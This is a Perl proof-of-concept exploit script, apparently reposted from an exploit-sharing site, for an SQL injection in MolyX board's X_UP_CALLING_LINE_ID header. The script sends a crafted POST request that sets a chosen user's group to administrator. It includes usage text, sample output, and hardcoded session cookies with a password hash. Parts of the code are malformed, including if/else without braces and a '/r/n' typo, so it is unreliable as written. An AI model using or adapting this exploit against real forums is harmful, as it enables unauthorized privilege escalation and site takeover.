# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit #!/usr/bin/perl -w use IO::Socket; ## PROOF-OF-CONCEPT ## * work only with php5 or php4&&GPC=off ## Example: ## C:\>mlexp.pl 127.0.0.1 /bbs/ 1 ## [~] prepare to connect... ## [+] connected ## [~] prepare to send data... ## [+] OK ## [~] wait for response... ## [+] Expoilted! Maybe Id=1 is Admin Now!! ## if (@ARGV < 3) { print "\n\n"; print "|****************************************************************|\n"; print " mlexp.pl\n"; print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)\n"; print " Usage: mlexp.pl <server> <folder> <user_id> \n"; print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1\n"; print " [~] <server> - server ip\n"; print " [~] <folder> - forum folder\n"; print " [~] <user_id> - user id \n"; print "|****************************************************************|\n"; print "\n\n"; exit(1); } $server = $ARGV[0]; $folder = $ARGV[1]; $user_id = $ARGV[2]; print "[~] prepare to connect...\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!"; print "[+] connected\n"; print "[~] prepare to send data...\n"; $cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn '; $useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)'; $evildata="0',usergroupid=4 where id=$user_id/*"; $script='/wap/associate.php?do=1'; $path =$folder.$script; $count=$count+1; $message = "POST ".$folder." HTTP/1.1\r\n"; $message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n"; $message .= "Referer: http://".$server.$folder."/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"; $message .= "Host: ".$server."\r\n"; $message .= "User-Agent: ".$useragent."\r\n"; $message .= "Connection: Keep-Alive\r\n"; $message .= "X_UP_CALLING_LINE_ID: ".$evildata."\r\n"; $message .= "Cookie: ".$cookie."\r\n"; $message .= "\r\n"; print $socket "$message"; print "[+] OK\n"; print "[~] wait for response...\n"; while ($answer = <$socket>) { if ($answer =~ /操作成功完成/) print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!\n" else print "[-] exploit failed\n"; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论